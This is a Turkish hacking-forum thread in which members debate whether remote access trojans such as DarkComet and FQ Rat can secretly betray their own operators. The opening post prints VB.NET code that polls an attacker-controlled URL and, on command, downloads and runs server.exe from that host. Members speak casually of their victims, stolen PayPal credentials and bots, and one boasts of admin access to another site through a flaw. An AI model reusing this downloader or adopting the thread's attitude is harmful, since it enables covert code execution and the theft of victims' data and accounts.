Darkcomet-Spynet ve Tum Ratlarda Bulunan Buyuk Tehlike

emreyavuz199696

Katılımcı Üye
4 Nis 2012
297
0
Baslikta belirttigim gibi tum ratlarda bulunan tehlikelerden bahsedecegim.

Bu konu hakkinda herkes Darkcomet vs ratlarin tamamen guvenli oldugunu dusunuyor ve herkes bu ratlara guvenerek server yediriyorlar.Dahada kotusu gelistiricisuni bile bilmeden bu ratlarin %100 guvenli oldugunu soyluyorlar ve buna kendilerise inaniyorlar. Biraz risklerden bahsedelim;

Kurban pclerindeki tum sifreler kullanilabiliyor olabilir.
Kurbanlarinizin paypal bilgileri calinabilir.

Bunlar sadece risklerden birkaci...

Darkcomet icin botlarinizi sistem sahiplerine kullanabilme olanagi saglayan kod sadece 4-10 satirdan olusuyor.Bu kodu gormek isteyen olursa ozelden atabilirim

Bu konuyu acmamdaki sebep; Hic kimse bu ratlarin gelisriricilerini bilmeden nasil kodlandiklarini bilmeden %100 guveli oldugunu dusunuyorlar ama sadece yeni ratlar (Fq Rat) icin bu risk varmis gibi gosteriyorlar ve bu bilincsizlik beni rahatsiz etti bu yuzden konuyu acma geregi duydum

Kisaca tum ratlarda risk aynidir.Yeni rat yada eski rat secimi yapmaktansa kullanisli olani secmenizi oneriyorum..

Eğer Rat Sahibi şu kodu trojana gömerse tüm botlarınız çalınır

Dim address As String = "http://kurbancal.com/calmaislemi.txt"
Dim client As WebClient = New WebClient()
Dim reader As StreamReader = New StreamReader(client.OpenRead(address))
if (reader.ReadToEnd= "1") Then
My.Computer.Network.DownloadFile("http://kurbancal.com/server.exe", "C:\server.exe")
Process.Start("C:\server.exe")
End if

Server in içine bu kodu gödüğü zaman server önce hacker in websitesini kontrol eder emir gelirse bilgisayara hacke in serveri ni indirir çalıştırır.

Kolay Gelsin...

Son düzenleme:

hackeralp24

Uzman üye
17 Ağu 2011
1,703
0
TurkHackTeam
Rat dediğin şey bir programdır ve detaylı analizde o programın nereye ne bağlantı gönderdiği nerelere bağlandığı öğrenilebilir darkcomet gibi ratların bi ana serveri gibi bir şeyi yok bi sunucu yok bilgileri toplayacak fq rat ise web üzerinden ve arka planda ne yapıldığını öğrenemeyiz birde darkcometin yapımcısı artık destek ve güncellemeri bıraktı buda onu güvenli yapan bir diğer unsur artık başıboş bir program halinde

Kim ne düşünüyor bilmem ama ben fq rat kullanmıyor ve çevremede tavsiye etmiyorum önyargım olduğunu düşünsenizde böyle düşünmekteyim ayrıca kurbanlarımın bir türkün eline geçmesindense yabancı birinin eline geçmesi daha az tehtit oluşturur benim ratıma yabancı biri takılınca bakmıyorum bile ne yapayım başka ülkedeki adamın hesaplarını

emreyavuz199696

Katılımcı Üye
4 Nis 2012
297
0
Rat dediğin şey bir programdır ve detaylı analizde o programın nereye ne bağlantı gönderdiği nerelere bağlandığı öğrenilebilir darkcomet gibi ratların bi ana serveri gibi bir şeyi yok bi sunucu yok bilgileri toplayacak fq rat ise web üzerinden ve arka planda ne yapıldığını öğrenemeyiz birde darkcometin yapımcısı artık destek ve güncellemeri bıraktı buda onu güvenli yapan bir diğer unsur artık başıboş bir program halinde

Kim ne düşünüyor bilmem ama ben fq rat kullanmıyor ve çevremede tavsiye etmiyorum önyargım olduğunu düşünsenizde böyle düşünmekteyim ayrıca kurbanlarımın bir türkün eline geçmesindense yabancı birinin eline geçmesi daha az tehtit oluşturur benim ratıma yabancı biri takılınca bakmıyorum bile ne yapayım başka ülkedeki adamın hesaplarını

Anlatamadim herhalde Siz Darkcomet in bagli oldugu server yok demissiniz.Zaten buna gerek yok.Bedava bir blogspot , tr.gg , facebook,twitter gibi yerlerden yonetilebilir.Hala daha Darkcometin kaynak kodlarini bilmeden onu savunuyorsunuz.Darkcometin gelistiricisi gelistirmeyi birakti diye BOTlarinizi kullanmaya devam etmeyecekmi. Sadece 50 karakterlik kod ile suan darkcometin tum serverlari bir blog face vb. araciligiyla yokedilebilir.

Zaten bende FQ Rat i kullanin diye bu yaziyi yazmasim.Burada Reklam yapacak halim yok. Bu yaziyi yazmamin amaci Fq rattaki tum risklerin guvendiginiz Darkcomette de olmasi. Bu riskler ancak Darkcometin kaynak kodlari goruldugu zaman ortadan kalkar.Baska sekilde ogrenilemez.

kolay gelsin......

batuuuzay

Katılımcı Üye
12 Şub 2011
596
1
İstanbul

Arkadaşa katılıyorum

17 Ara 2012
80
0
al işte ya fq rat sahibi olsan böyle bi reklam olmazdı :D fq rat dedigin Süs olarak kalmıs bi site adam resmen Heryere reklamı basmıs para kırıyor

xdebron

Kıdemli Üye
29 Ocak 2015
2,441
1
.
fq ratın da bir çok sorunu var.

mesela admin olarak girebiliyorum faqebook.ml ye :D

xdebron

Kıdemli Üye
29 Ocak 2015
2,441
1
.
adminin botlarini kullanmak disinda :D

ayrica bu diger uyelerin hesaplarina da girebilecegim anlamina geliyor?

emreyavuz199696

Katılımcı Üye
4 Nis 2012
297
0
adminin botlarini kullanmak disinda :D

ayrica bu diger uyelerin hesaplarina da girebilecegim anlamina geliyor?

Kullandigin acigi biliyorum. Fakat samimi bir sekilde soyluyorum. Duzeltmeye degecek bir acik degil. Zaten maks 3-4 bot kullanabilirsin. O da eger serverdaki FQ Security devreye girmezse.

Merak ettigim tek sey var.Misyona uygun olmamasina ragmen bir Türk sitesine neden Admin olarak girmek istiyorsun? Emin olun 10 yasindaki cocuk bile bu acigi kullanabilir. Yani Admin olarak siteye fazladan birsey yapamazsin ki :)

Kolay gelsin..

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.